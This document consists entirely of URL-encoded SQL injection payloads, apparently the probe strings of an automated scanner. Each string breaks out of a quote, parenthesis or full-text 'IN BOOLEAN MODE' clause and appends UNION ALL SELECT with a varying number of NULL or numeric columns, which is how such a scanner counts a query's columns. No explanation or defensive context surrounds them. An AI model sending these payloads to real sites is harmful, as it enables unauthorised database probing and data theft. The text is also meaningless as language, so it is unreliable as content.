-8447%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%2C6936%23 -7765%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%23 -1255%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%23 -2026%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%23 -6691%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%2C6823%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 